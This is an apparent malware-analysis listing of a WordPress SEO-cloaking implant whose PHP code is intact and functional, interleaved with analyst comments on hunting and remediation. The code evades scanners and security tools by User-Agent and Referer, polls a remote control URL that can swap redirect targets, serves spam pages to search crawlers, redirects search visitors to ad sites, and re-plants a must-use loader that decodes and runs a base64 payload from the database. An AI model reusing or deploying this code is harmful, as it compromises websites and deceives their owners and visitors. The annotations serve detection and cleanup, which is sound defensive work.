File: //tmp/wpc_aYeDKI
<?php
// Analyst summary: request-gating stage of an SEO-cloaking / conditional-redirect
// implant for WordPress. It calls get_option(), so it runs after WordPress is loaded.
// Every `return` below ends this script and hands the request back to the site
// untouched, so any client that hits a filter gets the normal, clean page.
//
// Inputs are all client-supplied request headers. User-Agent, Referer and URI are
// lowercased for substring matching; Host is kept raw and is later echoed into
// generated output.
$ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? "");
$ref = strtolower($_SERVER["HTTP_REFERER"] ?? "");
$path = strtolower($_SERVER["REQUEST_URI"] ?? "/");
$domain = $_SERVER["HTTP_HOST"] ?? "localhost";
// Skip wp-admin entirely
// Dashboard and login URLs are never altered, so an administrator working in the
// back end does not see the implant's behaviour.
if (strpos($path, "wp-admin") !== false || strpos($path, "wp-login") !== false) return;
// Load config
// Configuration is a JSON blob in the wp_options row "_wpc_feed_mod_cache"; the "on"
// key is the local enable flag. Hunting: look for this option name (and the other
// "_wpc_*" options read later in this file) in the options table.
$cfg = json_decode(get_option("_wpc_feed_mod_cache"), true);
if (!$cfg || empty($cfg["on"])) return;
// Block scanners
// Evasion list: command-line/scripted clients, SEO crawlers and WordPress security
// products named in their User-Agent get the clean site. A cleanup check made with
// curl/wget or a scanner that identifies itself this way is a false negative for
// this implant.
$bad = ["curl","wget","python","semrush","ahrefs","sucuri","wordfence","malcare","scanner","crawler"];
foreach ($bad as $b) { if (strpos($ua, $b) !== false) return; }
// Requests with no User-Agent at all are also left alone.
if (empty($ua)) return;
// Block debug referrers
// Visitors arriving from an admin page, Search Console or URL-analysis services
// (matched by Referer substring) also get the clean site, which hides the behaviour
// from people clicking through from those tools.
$dbg = ["wp-admin","administrator","search-console","virustotal","urlscan"];
foreach ($dbg as $d) { if (strpos($ref, $d) !== false) return; }
// C2 check (if configured)
// Remote control channel. When $cfg["c2"] is set, every request that reaches this
// point makes an outbound GET to that URL with a 3 second timeout; "@" hides any
// warning. The URL is not in this file: it is stored in the "_wpc_feed_mod_cache"
// option, so recover it from the database to get the network indicator.
// Detection: outbound HTTP from the PHP workers to a host unrelated to the site on
// ordinary page views, and added latency of up to the timeout.
if (!empty($cfg["c2"])) {
$r = @wp_remote_get($cfg["c2"], ["timeout" => 3]);
if (!is_wp_error($r)) {
// The response body is expected to be JSON carrying an "active" key.
$rc = json_decode(wp_remote_retrieve_body($r), true);
if ($rc && isset($rc["active"])) {
// Remote kill switch: a falsy "active" makes the implant stand down for this request.
if (!$rc["active"]) return;
if (!empty($rc["ads"])) {
// The operator can replace the redirect target list. The new list is written back
// to the options row, so it persists even if the remote host later goes away.
$cfg["ads"] = $rc["ads"];
update_option("_wpc_feed_mod_cache", json_encode($cfg));
}
}
}
}
// ── ROBOTS.TXT ──
// Any URI containing "robots.txt" that reaches this code is answered with an
// allow-all policy advertising /sitemap.xml on the requesting host, then the request
// ends. $domain comes from the client's Host header and is echoed unvalidated.
// Detection: a robots.txt that differs from what the site or its SEO plugin produces.
if (strpos($path, "robots.txt") !== false) {
$proto = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off") ? "https://" : "http://";
header("Content-Type: text/plain");
echo "User-agent: *\nAllow: /\n\nSitemap: {$proto}{$domain}/sitemap.xml\n";
exit;
}
// ── SITEMAP.XML ──
// Any URI containing both "sitemap" and ".xml" is answered with a generated sitemap
// built from the "links" list in the wp_options row "_wpc_timeout_theme_roots".
// If that option is missing or has no links, the request falls through to the
// code that follows.
if (strpos($path, "sitemap") !== false && strpos($path, ".xml") !== false) {
$kw_data = json_decode(get_option("_wpc_timeout_theme_roots"), true);
if ($kw_data && !empty($kw_data["links"])) {
$proto = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off") ? "https://" : "http://";
header("Content-Type: application/xml; charset=UTF-8");
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
echo "<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";
// Each stored link is emitted as host + path with no escaping. <lastmod> is always
// today's date, with fixed daily changefreq and priority 0.8. Detection: a sitemap
// in which every entry shares today's date and the paths are not real posts or pages.
foreach ($kw_data["links"] as $link) {
echo " <url><loc>{$proto}{$domain}{$link}</loc>";
echo "<lastmod>" . date("Y-m-d") . "</lastmod>";
echo "<changefreq>daily</changefreq><priority>0.8</priority></url>\n";
}
echo "</urlset>";
exit;
}
}
// ── BOT → SEO PAGE ──
// Cloaking for search-engine crawlers. The test is a User-Agent substring match only
// (no verification of the client's address is visible here), so an incident responder
// can observe the cloaked page by comparing responses across User-Agent values.
$bots = ["googlebot","bingbot","yandex","baiduspider","duckduckbot","applebot"];
$is_bot = false;
foreach ($bots as $b) { if (strpos($ua, $b) !== false) { $is_bot = true; break; } }
if ($is_bot) {
// Content comes from the "_wpc_timeout_theme_roots" option: "keywords" maps a URL
// fragment to a title/body pair, "links" is a list of paths.
$kw_data = json_decode(get_option("_wpc_timeout_theme_roots"), true);
if (!$kw_data) return;
$matched = null;
// The first keyword found in the requested path selects the content. With no match
// the first configured entry is used, so every non-admin URL on the site returns
// injected content to a crawler.
foreach ($kw_data["keywords"] as $kw => $data) {
if (strpos($path, $kw) !== false) { $matched = $data; break; }
}
if (!$matched) $matched = reset($kw_data["keywords"]);
$links_html = "";
if (!empty($kw_data["links"])) {
// Up to six randomly chosen stored paths become internal links; the anchor text is
// derived from the path itself ("-" and "/" replaced by spaces, words capitalised).
$shuffled = $kw_data["links"];
shuffle($shuffled);
foreach (array_slice($shuffled, 0, 6) as $link) {
$text = ucwords(str_replace(["-","/"], " ", trim($link, "/")));
$links_html .= "<li><a href=\"$link\">$text</a></li>";
}
}
// Status 200 is forced, so URLs that do not exist on the real site look like valid
// pages to the crawler. Title, body, Host and path are written into the HTML with
// no escaping.
header("HTTP/1.1 200 OK");
header("Content-Type: text/html; charset=UTF-8");
echo "<!DOCTYPE html><html lang=\"en\"><head>";
echo "<title>{$matched["title"]}</title>";
echo "<meta name=\"description\" content=\"" . substr($matched["body"], 0, 160) . "\">";
echo "<link rel=\"canonical\" href=\"https://{$domain}{$path}\">";
echo "</head><body>";
echo "<h1>{$matched["title"]}</h1>";
// The fixed strings "by Support Team" and "Related Solutions" are usable as content
// signatures when checking what search engines have indexed for the site.
echo "<p>" . date("F j, Y") . " — by Support Team</p>";
echo "<p>{$matched["body"]}</p>";
if ($links_html) echo "<h2>Related Solutions</h2><ul>{$links_html}</ul>";
echo "</body></html>";
exit;
}
// ── SEARCH USER → REDIRECT ──
// Conditional redirect of human visitors. It fires only when the Referer contains a
// search-engine domain fragment and the User-Agent does not contain "bot". Direct
// visits (typed URL, bookmark) carry no such Referer and are never redirected, which
// is why the site owner typically cannot reproduce what visitors report.
$ses = $cfg["search_engines"] ?? ["google.","bing.","yahoo.","yandex.","duckduckgo."];
$from_search = false;
foreach ($ses as $se) { if (strpos($ref, $se) !== false) { $from_search = true; break; } }
if ($from_search && strpos($ua, "bot") === false) {
$mode = $cfg["redirect_mode"] ?? "once";
// Destinations are the "ads" list from the stored config; one is picked at random
// per redirect. With an empty list the request passes through untouched.
$ads = $cfg["ads"] ?? [];
if (empty($ads)) return;
if ($mode === "always") {
// Redirect every single visit — no cookie check
wp_redirect($ads[array_rand($ads)]);
exit;
} elseif ($mode === "session") {
// Once per browser session (session cookie, expires when browser closes)
// Cookie name "__ga_sid" appears chosen to resemble analytics cookies; confirm it is
// not set by anything legitimate on the site before using it as an indicator.
$ck = "__ga_sid";
if (isset($_COOKIE[$ck])) return;
setcookie($ck, "1", 0, "/"); // 0 = session cookie
wp_redirect($ads[array_rand($ads)]);
exit;
} else {
// Default: once per X hours (cookie-based)
// The cookie "__ga_cache" holds an MD5 over client IP + current date-hour + an hour
// bucket. The value embeds the current clock hour, so a stored cookie stops matching
// once the hour changes, whatever "cookie_hours" says.
// Detection: the origin answering a search-referred page view with a redirect to an
// off-site URL together with a Set-Cookie for "__ga_cache" or "__ga_sid".
$hours = intval($cfg["cookie_hours"] ?? 24);
$ck = "__ga_cache";
$cv = md5($_SERVER["REMOTE_ADDR"] . date("Y-m-d-H") . floor(date("H") / max(1,$hours)));
if (isset($_COOKIE[$ck]) && $_COOKIE[$ck] === $cv) return;
setcookie($ck, $cv, time() + ($hours * 3600), "/");
wp_redirect($ads[array_rand($ads)]);
exit;
}
}
// ── SELF-HEAL (5% of requests) ──
// Persistence. On roughly 1 in 20 of the requests that get this far (not filtered,
// not served as a bot, not redirected), the script checks for a must-use plugin file
// and recreates it if it has been deleted.
// Remediation: deleting mu-plugins/cache-loader.php alone is not enough. The payload
// lives in the database option named below and this script rewrites the loader, so
// the "_wpc_*" option rows, the loader file and whatever else loads this script all
// have to be removed together.
if (mt_rand(1, 20) === 1) {
$opt = "_wpc_theme_manifest_cache";
// Must-use plugins are loaded by WordPress on every request without activation and
// are listed separately from regular plugins in the dashboard.
$mu_dir = defined("WPMU_PLUGIN_DIR") ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . "/mu-plugins";
$mu_file = $mu_dir . "/cache-loader.php";
if (!file_exists($mu_file)) {
// "@" suppresses errors from directory and file creation, so nothing is reported
// when this fails.
@mkdir($mu_dir, 0755, true);
// The generated loader, labelled as a cache layer, reads the option above. If the
// value is a string longer than 50 bytes it is base64-decoded into a temporary file
// (tempnam prefix "wp_"), included as PHP, and the temporary file is deleted.
// Detection: file-integrity monitoring on the mu-plugins directory, an unexpected
// cache-loader.php, short-lived "wp_*" files in the system temp directory, and
// wp_options rows holding long base64 strings.
// NOTE(review): the "File: //tmp/wpc_..." header on this listing suggests it was
// captured from such a temporary file, but its prefix ("wpc_") differs from the
// "wp_" used here — confirm which loader produced it.
$mc = "<?php\n// Database cache optimization layer\n";
$mc .= "\$_c = get_option(\"" . $opt . "\");\n";
$mc .= "if (is_string(\$_c) && strlen(\$_c) > 50) { \$t = tempnam(sys_get_temp_dir(),\"wp_\"); file_put_contents(\$t, base64_decode(\$_c)); include \$t; @unlink(\$t); }\n";
@file_put_contents($mu_file, $mc);
}
}